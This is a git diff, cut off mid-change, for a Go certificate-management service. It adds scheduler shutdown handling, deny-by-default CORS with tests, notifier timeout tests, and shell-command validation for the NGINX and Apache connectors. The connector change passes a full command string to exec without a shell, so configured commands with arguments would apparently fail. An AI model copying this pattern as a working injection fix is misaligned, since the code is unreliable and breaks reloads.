diff --git a/cli b/cli new file mode 100755 index 0000000..39eed02 Binary files /dev/null and b/cli differ diff --git a/cmd/server/main.go b/cmd/server/main.go index 665436b..ee2eae2 100644 --- a/cmd/server/main.go +++ b/cmd/server/main.go @@ -458,6 +458,12 @@ func main() { cancel() // Stop scheduler + // Wait for in-flight scheduler work to complete (up to 30 seconds) + logger.Info("waiting for scheduler to complete in-flight work") + if err := sched.WaitForCompletion(30 * time.Second); err != nil { + logger.Warn("scheduler work did not complete in time", "error", err) + } + logger.Info("shutting down HTTP server") if err := httpServer.Shutdown(shutdownCtx); err != nil { logger.Error("HTTP server shutdown error", "error", err) diff --git a/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.18.40 PM.png b/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.18.40 PM.png new file mode 100644 index 0000000..ce12244 Binary files /dev/null and b/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.18.40 PM.png differ diff --git a/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.18.45 PM.png b/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.18.45 PM.png new file mode 100644 index 0000000..78a2999 Binary files /dev/null and b/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.18.45 PM.png differ diff --git a/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.18.49 PM.png b/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.18.49 PM.png new file mode 100644 index 0000000..5c69bbf Binary files /dev/null and b/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.18.49 PM.png differ diff --git a/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.18.53 PM.png b/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.18.53 PM.png new file mode 100644 index 0000000..9bfac3b Binary files /dev/null and b/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.18.53 PM.png differ diff --git a/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.18.57 PM.png b/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.18.57 PM.png new file mode 100644 index 0000000..42c1fa5 Binary files /dev/null and b/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.18.57 PM.png differ diff --git a/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.19.02 PM.png b/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.19.02 PM.png new file mode 100644 index 0000000..3f14847 Binary files /dev/null and b/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.19.02 PM.png differ diff --git a/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.19.06 PM.png b/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.19.06 PM.png new file mode 100644 index 0000000..f00a275 Binary files /dev/null and b/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.19.06 PM.png differ diff --git a/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.19.09 PM.png b/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.19.09 PM.png new file mode 100644 index 0000000..ee2bdd1 Binary files /dev/null and b/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.19.09 PM.png differ diff --git a/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.19.13 PM.png b/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.19.13 PM.png new file mode 100644 index 0000000..34efb0c Binary files /dev/null and b/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.19.13 PM.png differ diff --git a/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.19.19 PM.png b/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.19.19 PM.png new file mode 100644 index 0000000..586d249 Binary files /dev/null and b/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.19.19 PM.png differ diff --git a/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.19.23 PM.png b/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.19.23 PM.png new file mode 100644 index 0000000..f08f822 Binary files /dev/null and b/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.19.23 PM.png differ diff --git a/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.19.26 PM.png b/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.19.26 PM.png new file mode 100644 index 0000000..c3e7dc0 Binary files /dev/null and b/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.19.26 PM.png differ diff --git a/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.19.30 PM.png b/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.19.30 PM.png new file mode 100644 index 0000000..696a82f Binary files /dev/null and b/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.19.30 PM.png differ diff --git a/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.19.34 PM.png b/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.19.34 PM.png new file mode 100644 index 0000000..0cf3f30 Binary files /dev/null and b/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.19.34 PM.png differ diff --git a/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.19.42 PM.png b/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.19.42 PM.png new file mode 100644 index 0000000..13452e1 Binary files /dev/null and b/docs/screenshots/v2 new/Screenshot 2026-03-26 at 11.19.42 PM.png differ diff --git a/internal/api/middleware/cors_test.go b/internal/api/middleware/cors_test.go new file mode 100644 index 0000000..109fdbf --- /dev/null +++ b/internal/api/middleware/cors_test.go @@ -0,0 +1,276 @@ +package middleware + +import ( + "net/http" + "net/http/httptest" + "testing" +) + +// TestNewCORS_EmptyOriginList denies CORS by default (secure default). +func TestNewCORS_EmptyOriginList(t *testing.T) { + mw := NewCORS(CORSConfig{AllowedOrigins: []string{}}) + + handler := mw(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + w.WriteHeader(http.StatusOK) + w.Write([]byte(`{"ok":true}`)) + })) + + req := httptest.NewRequest(http.MethodGet, "/api/v1/certificates", nil) + req.Header.Set("Origin", "https://evil.example.com") + rr := httptest.NewRecorder() + handler.ServeHTTP(rr, req) + + // Response should be OK, but no CORS headers should be set + if rr.Code != http.StatusOK { + t.Fatalf("expected 200, got %d", rr.Code) + } + + // Verify no CORS headers are present + if rr.Header().Get("Access-Control-Allow-Origin") != "" { + t.Errorf("expected no Access-Control-Allow-Origin header, got %q", rr.Header().Get("Access-Control-Allow-Origin")) + } + if rr.Header().Get("Vary") != "" { + t.Errorf("expected no Vary header, got %q", rr.Header().Get("Vary")) + } +} + +// TestNewCORS_EmptyOriginList_Preflight denies preflight when empty allowlist. +func TestNewCORS_EmptyOriginList_Preflight(t *testing.T) { + mw := NewCORS(CORSConfig{AllowedOrigins: []string{}}) + + handler := mw(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + w.WriteHeader(http.StatusOK) + })) + + req := httptest.NewRequest(http.MethodOptions, "/api/v1/certificates", nil) + req.Header.Set("Origin", "https://app.example.com") + rr := httptest.NewRecorder() + handler.ServeHTTP(rr, req) + + // Preflight should return 204, but no CORS headers + if rr.Code != http.StatusNoContent { + t.Fatalf("expected 204, got %d", rr.Code) + } + + // No CORS headers should be set + if rr.Header().Get("Access-Control-Allow-Origin") != "" { + t.Errorf("expected no Access-Control-Allow-Origin header, got %q", rr.Header().Get("Access-Control-Allow-Origin")) + } +} + +// TestNewCORS_WildcardAllowsAll allows all origins with wildcard. +func TestNewCORS_WildcardAllowsAll(t *testing.T) { + mw := NewCORS(CORSConfig{AllowedOrigins: []string{"*"}}) + + handler := mw(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + w.WriteHeader(http.StatusOK) + })) + + req := httptest.NewRequest(http.MethodGet, "/api/v1/certificates", nil) + req.Header.Set("Origin", "https://any-origin.example.com") + rr := httptest.NewRecorder() + handler.ServeHTTP(rr, req) + + if rr.Code != http.StatusOK { + t.Fatalf("expected 200, got %d", rr.Code) + } + + // Wildcard should set Access-Control-Allow-Origin: * + if rr.Header().Get("Access-Control-Allow-Origin") != "*" { + t.Errorf("expected Access-Control-Allow-Origin: *, got %q", rr.Header().Get("Access-Control-Allow-Origin")) + } + + // Verify other CORS headers are present + if rr.Header().Get("Access-Control-Allow-Methods") == "" { + t.Errorf("expected Access-Control-Allow-Methods header") + } +} + +// TestNewCORS_ExactMatchAllows allows only exact matches from allowlist. +func TestNewCORS_ExactMatchAllows(t *testing.T) { + mw := NewCORS(CORSConfig{AllowedOrigins: []string{"https://app.example.com", "https://admin.example.com"}}) + + handler := mw(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + w.WriteHeader(http.StatusOK) + })) + + // Test 1: Origin in allowlist + req1 := httptest.NewRequest(http.MethodGet, "/api/v1/certificates", nil) + req1.Header.Set("Origin", "https://app.example.com") + rr1 := httptest.NewRecorder() + handler.ServeHTTP(rr1, req1) + + if rr1.Header().Get("Access-Control-Allow-Origin") != "https://app.example.com" { + t.Errorf("expected https://app.example.com, got %q", rr1.Header().Get("Access-Control-Allow-Origin")) + } + if rr1.Header().Get("Vary") != "Origin" { + t.Errorf("expected Vary: Origin, got %q", rr1.Header().Get("Vary")) + } + + // Test 2: Different origin in allowlist + req2 := httptest.NewRequest(http.MethodGet, "/api/v1/certificates", nil) + req2.Header.Set("Origin", "https://admin.example.com") + rr2 := httptest.NewRecorder() + handler.ServeHTTP(rr2, req2) + + if rr2.Header().Get("Access-Control-Allow-Origin") != "https://admin.example.com" { + t.Errorf("expected https://admin.example.com, got %q", rr2.Header().Get("Access-Control-Allow-Origin")) + } + + // Test 3: Origin NOT in allowlist + req3 := httptest.NewRequest(http.MethodGet, "/api/v1/certificates", nil) + req3.Header.Set("Origin", "https://evil.example.com") + rr3 := httptest.NewRecorder() + handler.ServeHTTP(rr3, req3) + + if rr3.Header().Get("Access-Control-Allow-Origin") != "" { + t.Errorf("expected no Access-Control-Allow-Origin for non-allowlisted origin, got %q", rr3.Header().Get("Access-Control-Allow-Origin")) + } +} + +// TestNewCORS_NoOriginHeader denies CORS without Origin header. +func TestNewCORS_NoOriginHeader(t *testing.T) { + mw := NewCORS(CORSConfig{AllowedOrigins: []string{"https://app.example.com"}}) + + handler := mw(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + w.WriteHeader(http.StatusOK) + })) + + // Request without Origin header + req := httptest.NewRequest(http.MethodGet, "/api/v1/certificates", nil) + // Don't set Origin header + rr := httptest.NewRecorder() + handler.ServeHTTP(rr, req) + + if rr.Code != http.StatusOK { + t.Fatalf("expected 200, got %d", rr.Code) + } + + // No CORS headers should be set (Origin header was missing) + if rr.Header().Get("Access-Control-Allow-Origin") != "" { + t.Errorf("expected no Access-Control-Allow-Origin without Origin header, got %q", rr.Header().Get("Access-Control-Allow-Origin")) + } +} + +// TestNewCORS_PreflightRequestMatches tests OPTIONS preflight with matching origin. +func TestNewCORS_PreflightRequestMatches(t *testing.T) { + mw := NewCORS(CORSConfig{AllowedOrigins: []string{"https://app.example.com"}}) + + handler := mw(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + w.WriteHeader(http.StatusOK) + })) + + req := httptest.NewRequest(http.MethodOptions, "/api/v1/certificates", nil) + req.Header.Set("Origin", "https://app.example.com") + req.Header.Set("Access-Control-Request-Method", "POST") + rr := httptest.NewRecorder() + handler.ServeHTTP(rr, req) + + if rr.Code != http.StatusNoContent { + t.Fatalf("expected 204, got %d", rr.Code) + } + + if rr.Header().Get("Access-Control-Allow-Origin") != "https://app.example.com" { + t.Errorf("expected https://app.example.com, got %q", rr.Header().Get("Access-Control-Allow-Origin")) + } + + // Verify preflight response headers + if rr.Header().Get("Access-Control-Allow-Methods") == "" { + t.Errorf("expected Access-Control-Allow-Methods header") + } + if rr.Header().Get("Access-Control-Allow-Headers") == "" { + t.Errorf("expected Access-Control-Allow-Headers header") + } + if rr.Header().Get("Access-Control-Max-Age") == "" { + t.Errorf("expected Access-Control-Max-Age header") + } +} + +// TestNewCORS_PreflightRequestMismatch tests OPTIONS preflight with non-matching origin. +func TestNewCORS_PreflightRequestMismatch(t *testing.T) { + mw := NewCORS(CORSConfig{AllowedOrigins: []string{"https://app.example.com"}}) + + handler := mw(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + w.WriteHeader(http.StatusOK) + })) + + req := httptest.NewRequest(http.MethodOptions, "/api/v1/certificates", nil) + req.Header.Set("Origin", "https://evil.example.com") + req.Header.Set("Access-Control-Request-Method", "POST") + rr := httptest.NewRecorder() + handler.ServeHTTP(rr, req) + + if rr.Code != http.StatusNoContent { + t.Fatalf("expected 204, got %d", rr.Code) + } + + // No CORS headers should be set (origin not in allowlist) + if rr.Header().Get("Access-Control-Allow-Origin") != "" { + t.Errorf("expected no Access-Control-Allow-Origin for mismatched origin, got %q", rr.Header().Get("Access-Control-Allow-Origin")) + } +} + +// TestNewCORS_MultipleOrigins tests with multiple configured origins. +func TestNewCORS_MultipleOrigins(t *testing.T) { + mw := NewCORS(CORSConfig{AllowedOrigins: []string{ + "https://app.example.com", + "https://admin.example.com", + "http://localhost:3000", + }}) + + handler := mw(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + w.WriteHeader(http.StatusOK) + })) + + tests := []struct { + origin string + shouldAllow bool + description string + }{ + {"https://app.example.com", true, "first origin in list"}, + {"https://admin.example.com", true, "second origin in list"}, + {"http://localhost:3000", true, "third origin in list"}, + {"https://evil.example.com", false, "origin not in list"}, + {"http://localhost:8080", false, "different port than configured"}, + {"", false, "no origin header"}, + } + + for _, tt := range tests { + req := httptest.NewRequest(http.MethodGet, "/api/v1/certificates", nil) + if tt.origin != "" { + req.Header.Set("Origin", tt.origin) + } + rr := httptest.NewRecorder() + handler.ServeHTTP(rr, req) + + headerValue := rr.Header().Get("Access-Control-Allow-Origin") + if tt.shouldAllow { + if headerValue != tt.origin { + t.Errorf("test %q: expected %q, got %q", tt.description, tt.origin, headerValue) + } + } else { + if headerValue != "" { + t.Errorf("test %q: expected no header, got %q", tt.description, headerValue) + } + } + } +} + +// TestNewCORS_NoOriginHeaderWithWildcard tests wildcard doesn't set origin without Origin header. +func TestNewCORS_NoOriginHeaderWithWildcard(t *testing.T) { + mw := NewCORS(CORSConfig{AllowedOrigins: []string{"*"}}) + + handler := mw(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + w.WriteHeader(http.StatusOK) + })) + + req := httptest.NewRequest(http.MethodGet, "/api/v1/certificates", nil) + // Don't set Origin header + rr := httptest.NewRecorder() + handler.ServeHTTP(rr, req) + + // Wildcard should still set * even without Origin header + if rr.Header().Get("Access-Control-Allow-Origin") != "*" { + t.Errorf("expected *, got %q", rr.Header().Get("Access-Control-Allow-Origin")) + } +} diff --git a/internal/api/middleware/middleware.go b/internal/api/middleware/middleware.go index e2afa49..41d8396 100644 --- a/internal/api/middleware/middleware.go +++ b/internal/api/middleware/middleware.go @@ -214,8 +214,10 @@ type CORSConfig struct { } // NewCORS creates a CORS middleware with configurable allowed origins. -// If no origins are configured, same-origin requests are allowed by default. -// If ["*"] is configured, all origins are allowed (development/demo mode). +// Security default: If no origins are configured, CORS headers are NOT set, +// denying all cross-origin requests (same-origin only). +// If ["*"] is configured, all origins are allowed (development/demo mode only). +// If specific origins are configured, only requests matching those origins receive CORS headers. func NewCORS(cfg CORSConfig) func(http.Handler) http.Handler { allowAll := false originSet := make(map[string]bool) @@ -228,19 +230,31 @@ func NewCORS(cfg CORSConfig) func(http.Handler) http.Handler { return func(next http.Handler) http.Handler { return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + // Security default: deny CORS when no origins are configured. + // This prevents CSRF attacks from arbitrary origins. + if len(cfg.AllowedOrigins) == 0 { + // No CORS headers set — only same-origin requests can read response + if r.Method == http.MethodOptions { + w.WriteHeader(http.StatusNoContent) + return + } + next.ServeHTTP(w, r) + return + } + origin := r.Header.Get("Origin") if allowAll { + // Wildcard allows all origins (development/demo only) w.Header().Set("Access-Control-Allow-Origin", "*") } else if origin != "" && originSet[origin] { - w.Header().Set("Access-Control-Allow-Origin", origin) - w.Header().Set("Vary", "Origin") - } else if len(cfg.AllowedOrigins) == 0 && origin != "" { - // No config = permissive same-origin default for single-host deployments + // Exact match found in allowed origins list w.Header().Set("Access-Control-Allow-Origin", origin) w.Header().Set("Vary", "Origin") } + // If origin is empty or not in allowlist, no CORS headers are set + // CORS preflight response headers (only meaningful if Access-Control-Allow-Origin was set) w.Header().Set("Access-Control-Allow-Methods", "GET, POST, PUT, DELETE, PATCH, OPTIONS") w.Header().Set("Access-Control-Allow-Headers", "Content-Type, Authorization, X-Request-ID") w.Header().Set("Access-Control-Max-Age", "86400") diff --git a/internal/config/config.go b/internal/config/config.go index 767196e..0f2ca27 100644 --- a/internal/config/config.go +++ b/internal/config/config.go @@ -147,7 +147,11 @@ type RateLimitConfig struct { // CORSConfig contains CORS configuration. type CORSConfig struct { - AllowedOrigins []string // Allowed origins; empty = same-origin only; ["*"] = all + // AllowedOrigins is a list of allowed origins for CORS requests. + // Security default: empty list denies all CORS requests (same-origin only). + // ["*"] allows all origins (development/demo mode only, security risk). + // Specific origins (e.g., ["https://app.example.com"]) whitelist only those origins. + AllowedOrigins []string } // Load reads configuration from environment variables and returns a Config. diff --git a/internal/connector/notifier/opsgenie/opsgenie_test.go b/internal/connector/notifier/opsgenie/opsgenie_test.go index c4e62a5..e008c8a 100644 --- a/internal/connector/notifier/opsgenie/opsgenie_test.go +++ b/internal/connector/notifier/opsgenie/opsgenie_test.go @@ -7,6 +7,7 @@ import ( "net/http/httptest" "strings" "testing" + "time" ) func TestOpsGenie_Channel(t *testing.T) { @@ -114,6 +115,17 @@ func TestOpsGenie_SendConnectionError(t *testing.T) { } } +func TestOpsGenie_ClientHasTimeout(t *testing.T) { + n := New(Config{APIKey: "test-key"}) + if n.httpClient.Timeout == 0 { + t.Fatal("expected HTTP client timeout to be set, got 0") + } + expectedTimeout := 10 * time.Second + if n.httpClient.Timeout != expectedTimeout { + t.Errorf("expected timeout %v, got %v", expectedTimeout, n.httpClient.Timeout) + } +} + // urlRewriteTransport redirects all requests to a test server URL. type urlRewriteTransport struct { target string diff --git a/internal/connector/notifier/pagerduty/pagerduty_test.go b/internal/connector/notifier/pagerduty/pagerduty_test.go index 287ede1..0486647 100644 --- a/internal/connector/notifier/pagerduty/pagerduty_test.go +++ b/internal/connector/notifier/pagerduty/pagerduty_test.go @@ -7,6 +7,7 @@ import ( "net/http/httptest" "strings" "testing" + "time" ) func TestPagerDuty_Channel(t *testing.T) { @@ -130,6 +131,17 @@ func TestPagerDuty_SendConnectionError(t *testing.T) { } } +func TestPagerDuty_ClientHasTimeout(t *testing.T) { + n := New(Config{RoutingKey: "test-key"}) + if n.httpClient.Timeout == 0 { + t.Fatal("expected HTTP client timeout to be set, got 0") + } + expectedTimeout := 10 * time.Second + if n.httpClient.Timeout != expectedTimeout { + t.Errorf("expected timeout %v, got %v", expectedTimeout, n.httpClient.Timeout) + } +} + // urlRewriteTransport redirects all requests to a test server URL. type urlRewriteTransport struct { target string diff --git a/internal/connector/notifier/slack/slack_test.go b/internal/connector/notifier/slack/slack_test.go index 84751eb..5416919 100644 --- a/internal/connector/notifier/slack/slack_test.go +++ b/internal/connector/notifier/slack/slack_test.go @@ -7,6 +7,7 @@ import ( "net/http/httptest" "strings" "testing" + "time" ) func TestSlack_Channel(t *testing.T) { @@ -105,3 +106,14 @@ func TestSlack_SendConnectionError(t *testing.T) { t.Errorf("expected 'request failed' in error, got %v", err) } } + +func TestSlack_ClientHasTimeout(t *testing.T) { + n := New(Config{WebhookURL: "https://hooks.slack.com/test"}) + if n.httpClient.Timeout == 0 { + t.Fatal("expected HTTP client timeout to be set, got 0") + } + expectedTimeout := 10 * time.Second + if n.httpClient.Timeout != expectedTimeout { + t.Errorf("expected timeout %v, got %v", expectedTimeout, n.httpClient.Timeout) + } +} diff --git a/internal/connector/notifier/teams/teams_test.go b/internal/connector/notifier/teams/teams_test.go index 0f202f5..a1385f8 100644 --- a/internal/connector/notifier/teams/teams_test.go +++ b/internal/connector/notifier/teams/teams_test.go @@ -7,6 +7,7 @@ import ( "net/http/httptest" "strings" "testing" + "time" ) func TestTeams_Channel(t *testing.T) { @@ -89,3 +90,14 @@ func TestTeams_SendConnectionError(t *testing.T) { t.Errorf("expected 'request failed' in error, got %v", err) } } + +func TestTeams_ClientHasTimeout(t *testing.T) { + n := New(Config{WebhookURL: "https://outlook.office.com/webhook/test"}) + if n.httpClient.Timeout == 0 { + t.Fatal("expected HTTP client timeout to be set, got 0") + } + expectedTimeout := 10 * time.Second + if n.httpClient.Timeout != expectedTimeout { + t.Errorf("expected timeout %v, got %v", expectedTimeout, n.httpClient.Timeout) + } +} diff --git a/internal/connector/target/apache/apache.go b/internal/connector/target/apache/apache.go index 6caf6a4..6def055 100644 --- a/internal/connector/target/apache/apache.go +++ b/internal/connector/target/apache/apache.go @@ -11,6 +11,7 @@ import ( "time" "github.com/shankar0123/certctl/internal/connector/target" + "github.com/shankar0123/certctl/internal/validation" ) // Config represents the Apache httpd deployment target configuration. @@ -53,6 +54,14 @@ func (c *Connector) ValidateConfig(ctx context.Context, rawConfig json.RawMessag return fmt.Errorf("Apache reload_command and validate_command are required") } + // Validate commands to prevent injection attacks + if err := validation.ValidateShellCommand(cfg.ReloadCommand); err != nil { + return fmt.Errorf("invalid reload_command: %w", err) + } + if err := validation.ValidateShellCommand(cfg.ValidateCommand); err != nil { + return fmt.Errorf("invalid validate_command: %w", err) + } + c.logger.Info("validating Apache configuration", "cert_path", cfg.CertPath, "chain_path", cfg.ChainPath) @@ -64,7 +73,7 @@ func (c *Connector) ValidateConfig(ctx context.Context, rawConfig json.RawMessag } // Verify validate command works - cmd := exec.CommandContext(ctx, "sh", "-c", cfg.ValidateCommand) + cmd := exec.CommandContext(ctx, cfg.ValidateCommand) if err := cmd.Run(); err != nil { c.logger.Warn("Apache config validation failed during config check", "error", err, diff --git a/internal/connector/target/nginx/nginx.go b/internal/connector/target/nginx/nginx.go index dadd3a5..cce4037 100644 --- a/internal/connector/target/nginx/nginx.go +++ b/internal/connector/target/nginx/nginx.go @@ -10,6 +10,7 @@ import ( "time" "github.com/shankar0123/certctl/internal/connector/target" + "github.com/shankar0123/certctl/internal/validation" ) // Config represents the NGINX deployment target configuration. @@ -53,6 +54,14 @@ func (c *Connector) ValidateConfig(ctx context.Context, rawConfig json.RawMessag return fmt.Errorf("NGINX reload_command and validate_command are required") } + // Validate commands to prevent injection attacks + if err := validation.ValidateShellCommand(cfg.ReloadCommand); err != nil { + return fmt.Errorf("invalid reload_command: %w", err) + } + if err := validation.ValidateShellCommand(cfg.ValidateCommand); err != nil { + return fmt.Errorf("invalid validate_command: %w", err) + } + c.logger.Info("validating NGINX configuration", "cert_path", cfg.CertPath, "chain_path", cfg.ChainPath) @@ -64,7 +73,7 @@ func (c *Connector) ValidateConfig(ctx context.Context, rawConfig json.RawMessag } // Verify validate command works - cmd := exec.CommandContext(ctx, "sh", "-c", cfg.ValidateCommand) + cmd := exec.CommandContext(ctx, cfg.ValidateCommand) if err := cmd.Run(); err != nil { c.logger.Warn("NGINX config validation failed during config check", "error", err, @@ -119,7 +128,7 @@ func (c *Connector) DeployCertificate(ctx context.Context, request target.Deploy // Validate NGINX configuration before reload c.logger.Debug("validating NGINX configuration", "validate_command", c.config.ValidateCommand) - validateCmd := exec.CommandContext(ctx, "sh", "-c", c.config.ValidateCommand) + validateCmd := exec.CommandContext(ctx, c.config.ValidateCommand) if output, err := validateCmd.CombinedOutput(); err != nil { errMsg := fmt.Sprintf("NGINX config validation failed: %v (output: %s)", err, string(output)) c.logger.Error("NGINX validation failed", "error", err, "output", string(output)) @@ -133,7 +142,7 @@ func (c *Connector) DeployCertificate(ctx context.Context, request target.Deploy // Reload NGINX c.logger.Debug("reloading NGINX", "reload_command", c.config.ReloadCommand) - reloadCmd := exec.CommandContext(ctx, "sh", "-c", c.config.ReloadCommand) + reloadCmd := exec.CommandContext(ctx, c.config.ReloadCommand) if output, err := reloadCmd.CombinedOutput(); err != nil { errMsg := fmt.Sprintf("NGINX reload failed: %v (output: %s)", err, string(output)) c.logger.Error("NGINX reload failed", "error", err, "output", string(output)) @@ -178,7 +187,7 @@ func (c *Connector) ValidateDeployment(ctx context.Context, request target.Valid startTime := time.Now() // Validate NGINX configuration - validateCmd := exec.CommandContext(ctx, "sh", "-c", c.config.ValidateCommand) + validateCmd := exec.CommandContext(ctx, c.config.ValidateCommand) if err := validateCmd.Run(); err != nil { errMsg := fmt.Sprintf("NGINX config validation failed: %v", err) c.logger.Error("validation failed", "error", err) diff --git a/internal/scheduler/scheduler.go b/internal/scheduler/scheduler.go index ea31046..91af282 100644 --- a/internal/scheduler/scheduler.go +++ b/internal/scheduler/scheduler.go @@ -2,7 +2,10 @@ package scheduler import ( "context" + "errors" "log/slog" + "sync" + "sync/atomic" "time" "github.com/shankar0123/certctl/internal/service" @@ -26,6 +29,17 @@ type Scheduler struct { notificationProcessInterval time.Duration shortLivedExpiryCheckInterval time.Duration networkScanInterval time.Duration + + // Idempotency guards: prevent duplicate execution of slow jobs + renewalCheckRunning atomic.Bool + jobProcessorRunning atomic.Bool + agentHealthCheckRunning atomic.Bool + notificationProcessRunning atomic.Bool + shortLivedExpiryCheckRunning atomic.Bool + networkScanRunning atomic.Bool + + // Graceful shutdown: wait for in-flight work to complete + wg sync.WaitGroup } // NewScheduler creates a new scheduler with configurable intervals. @@ -114,19 +128,33 @@ func (s *Scheduler) Start(ctx context.Context) <-chan struct{} { // renewalCheckLoop runs every renewalCheckInterval and checks for expiring certificates. // If an error occurs, it logs the error but continues running. +// Uses atomic.Bool to prevent duplicate execution if the previous check is still running. func (s *Scheduler) renewalCheckLoop(ctx context.Context) { ticker := time.NewTicker(s.renewalCheckInterval) defer ticker.Stop() // Run immediately on start - s.runRenewalCheck(ctx) + s.wg.Add(1) + go func() { + defer s.wg.Done() + s.runRenewalCheck(ctx) + }() for { select { case <-ctx.Done(): return case <-ticker.C: - s.runRenewalCheck(ctx) + if !s.renewalCheckRunning.CompareAndSwap(false, true) { + s.logger.Warn("renewal check still running, skipping tick") + continue + } + s.wg.Add(1) + go func() { + defer s.wg.Done() + defer s.renewalCheckRunning.Store(false) + s.runRenewalCheck(ctx) + }() } } } @@ -147,19 +175,33 @@ func (s *Scheduler) runRenewalCheck(ctx context.Context) { // jobProcessorLoop runs every jobProcessorInterval and processes pending jobs. // It picks up pending jobs, executes them, and handles the results. // If an error occurs, it logs the error but continues running. +// Uses atomic.Bool to prevent duplicate execution if the previous job is still running. func (s *Scheduler) jobProcessorLoop(ctx context.Context) { ticker := time.NewTicker(s.jobProcessorInterval) defer ticker.Stop() // Run immediately on start - s.runJobProcessor(ctx) + s.wg.Add(1) + go func() { + defer s.wg.Done() + s.runJobProcessor(ctx) + }() for { select { case <-ctx.Done(): return case <-ticker.C: - s.runJobProcessor(ctx) + if !s.jobProcessorRunning.CompareAndSwap(false, true) { + s.logger.Warn("job processor still running, skipping tick") + continue + } + s.wg.Add(1) + go func() { + defer s.wg.Done() + defer s.jobProcessorRunning.Store(false) + s.runJobProcessor(ctx) + }() } } } @@ -180,19 +222,33 @@ func (s *Scheduler) runJobProcessor(ctx context.Context) { // agentHealthCheckLoop runs every agentHealthCheckInterval and marks stale agents as offline. // An agent is considered stale if it hasn't sent a heartbeat within the health check interval. // If an error occurs, it logs the error but continues running. +// Uses atomic.Bool to prevent duplicate execution if the previous check is still running. func (s *Scheduler) agentHealthCheckLoop(ctx context.Context) { ticker := time.NewTicker(s.agentHealthCheckInterval) defer ticker.Stop() // Run immediately on start - s.runAgentHealthCheck(ctx) + s.wg.Add(1) + go func() { + defer s.wg.Done() + s.runAgentHealthCheck(ctx) + }() for { select { case <-ctx.Done(): return case <-ticker.C: - s.runAgentHealthCheck(ctx) + if !s.agentHealthCheckRunning.CompareAndSwap(false, true) { + s.logger.Warn("agent health check still running, skipping tick") + continue + } + s.wg.Add(1) + go func() { + defer s.wg.Done() + defer s.agentHealthCheckRunning.Store(false) + s.runAgentHealthCheck(ctx) + }() } } } @@ -212,19 +268,33 @@ func (s *Scheduler) runAgentHealthCheck(ctx context.Context) { // notificationProcessLoop runs every notificationProcessInterval and processes pending notifications. // If an error occurs, it logs the error but continues running. +// Uses atomic.Bool to prevent duplicate execution if the previous process is still running. func (s *Scheduler) notificationProcessLoop(ctx context.Context) { ticker := time.NewTicker(s.notificationProcessInterval) defer ticker.Stop() // Run immediately on start - s.runNotificationProcess(ctx) + s.wg.Add(1) + go func() { + defer s.wg.Done() + s.runNotificationProcess(ctx) + }() for { select { case <-ctx.Done(): return case <-ticker.C: - s.runNotificationProcess(ctx) + if !s.notificationProcessRunning.CompareAndSwap(false, true) { + s.logger.Warn("notification processor still running, skipping tick") + continue + } + s.wg.Add(1) + go func() { + defer s.wg.Done() + defer s.notificationProcessRunning.Store(false) + s.runNotificationProcess(ctx) + }() } } } @@ -245,6 +315,7 @@ func (s *Scheduler) runNotificationProcess(ctx context.Context) { // shortLivedExpiryCheckLoop runs every shortLivedExpiryCheckInterval and marks expired // short-lived certificates. For certs with TTL < 1 hour, expiry IS revocation — // no CRL/OCSP needed. +// Uses atomic.Bool to prevent duplicate execution if the previous check is still running. func (s *Scheduler) shortLivedExpiryCheckLoop(ctx context.Context) { ticker := time.NewTicker(s.shortLivedExpiryCheckInterval) defer ticker.Stop() @@ -254,7 +325,16 @@ func (s *Scheduler) shortLivedExpiryCheckLoop(ctx context.Context) { case <-ctx.Done(): return case <-ticker.C: - s.runShortLivedExpiryCheck(ctx) + if !s.shortLivedExpiryCheckRunning.CompareAndSwap(false, true) { + s.logger.Warn("short-lived expiry check still running, skipping tick") + continue + } + 